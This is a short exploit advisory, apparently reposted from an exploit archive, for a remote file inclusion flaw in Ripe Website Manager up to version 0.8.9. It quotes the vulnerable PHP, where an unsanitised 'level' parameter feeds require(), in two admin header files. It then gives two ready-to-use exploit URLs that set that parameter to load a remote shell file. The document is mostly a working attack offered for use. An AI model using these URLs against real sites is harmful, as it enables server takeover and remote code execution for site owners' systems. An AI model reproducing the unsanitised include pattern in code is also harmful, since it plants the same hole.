Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns

===============================================================
Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns
===============================================================



#Author::   BlackNDoor 
#Homepage:: www.learntohell.net
#
#Script::   Ripe Wepsite Manager
#Version::  <= v0.8.9
#Type::     Remote File Include


#Bug::
   -> Files:

      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php

   -> vulncode:

      <?php
         ...
         define("LEVEL", $level); // directory level
         
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>

#Exploit::

   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?



#  0day.today [2018-03-09]  #